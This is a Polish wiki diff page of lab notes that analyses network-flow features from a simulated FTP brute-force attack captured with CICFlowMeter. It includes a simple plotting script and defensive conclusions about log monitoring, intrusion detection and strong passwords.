+Wynik ekstrakcji cech do pobrania {{:notatki:ftp_attack.csv}}
+===== Kluczowe cechy wyniku (Analiza pierwszego wiersza CSV) =====
+<code>
+src_ip=10.10.10.1, dst_ip=10.10.10.2, dst_port=37852, protocol=6 (TCP)
+flow_duration=103.3 s
+tot_fwd_pkts=10, tot_bwd_pkts=7
+flow_byts_s ≈ 12.13 B/s, flow_pkts_s ≈ 0.165 pkt/s
+pkt_len_mean ≈ 73.7 B
+flow_iat_mean ≈ 16.47 s
+bwd_blk_rate_avg ≈ 0.7 (ilość pakietów w tył do przodu)
+</code>
+  * ''flow_duration'' (~103 s) – sesja trwała ponad 1,5 minuty; w przypadku automatycznego ataku można się tego spodziewać, gdy serwer zwalnia odpowiedzi.
+  * ''tot_fwd_pkts'' = 10, ''tot_bwd_pkts'' = 7 – 10 prób logowania z serwera (komunikaty żądania), 7 odpowiedzi serwera (błędy logowania).
+  * ''flow_byts_s'' ≈ 12 B/s – to stosunkowo niska przepustowość, typowa dla sesji inicjowanych ręcznie lub przy wolnym ftp.
+  * ''flow_pkts_s'' ≈ 0.165 pkt/s – bardzo rzadkie pakiety (średnio co 6 sekund), co może sugerować rate-limit lub timeout serwera.
+  * ''flow_iat_mean'' ≈ 16 s – średnia odległość czasowa między pakietami to 16 s, co wskazuje na powolną interakcję między próbami.
+===== Uproszczona sygnatura ataku =====
+Poniżej prosty skrypt wizualizujący dane wyjściowe z programu CICFlowMeter:\\
+<code python signature_grapher.py>
+import pandas as pd
+import matplotlib.pyplot as plt
+# Wczytanie danych z pliku CSV
+df = pd.read_csv('ftp_attack.csv')
+# Wybór interesujących cech
+features = ['flow_duration', 'flow_byts_s', 'flow_pkts_s', 'fwd_pkts_s', 'bwd_pkts_s',
+            'tot_fwd_pkts', 'tot_bwd_pkts', 'totlen_fwd_pkts', 'totlen_bwd_pkts',
+            'fwd_pkt_len_max', 'bwd_pkt_len_max', 'flow_iat_mean', 'flow_iat_std',
+            'flow_iat_max', 'flow_iat_min']
+df_selected = df[features]
+# Normalizacja danych (opcjonalnie)
+df_normalized = (df_selected - df_selected.mean()) / df_selected.std()
+# Wizualizacja
+plt.figure(figsize=(12, 8))
+for feature in df_normalized.columns:
+    plt.plot(df_normalized.index, df_normalized[feature], label=feature)
+plt.title('Sygnatura Ataku')
+plt.xlabel('Indeks Przepływu')
+plt.ylabel('Znormalizowana Wartość')
+plt.legend()
+plt.grid(True)
+plt.show()
+</code>
+{{.:pasted:20250619-194744.png}}
+====== Wnioski ======
+  * Skuteczność ataku brute-force zależy od słownika – jeśli hasło użytkownika nie jest w słowniku, atak się nie powiedzie, choć nadal generuje duży ruch i może zostać wykryty.
+  * Monitorowanie logów serwera FTP jest kluczowe – logi wyraźnie pokazują wielokrotne, nieudane próby logowania, co pozwala administratorowi wykryć próbę ataku.
+  * Przechwytywanie i analiza ruchu (tcpdump + CICFlowMeter) – umożliwiają szczegółową analizę zachowania sieci podczas ataku, co może być wykorzystane do budowy systemów wykrywania włamań (IDS).
+  * Ograniczenie szybkości ataku (--rate-limit=50) – jest istotne, aby nie przeciążyć serwera i lepiej symulować realistyczne warunki ataku.
+  * Silne, losowe hasło zabezpiecza konto – stosowanie silnych haseł, które nie występują w popularnych słownikach, jest podstawową ochroną przed atakami brute-force.
+  * Środowisko testowe oparte na VM i Hyper-V – pozwala na bezpieczne i kontrolowane przeprowadzanie eksperymentów bezpieczeństwa.

Kacper's Wiki

Narzędzia użytkownika

Narzędzia witryny

Różnice

Narzędzia strony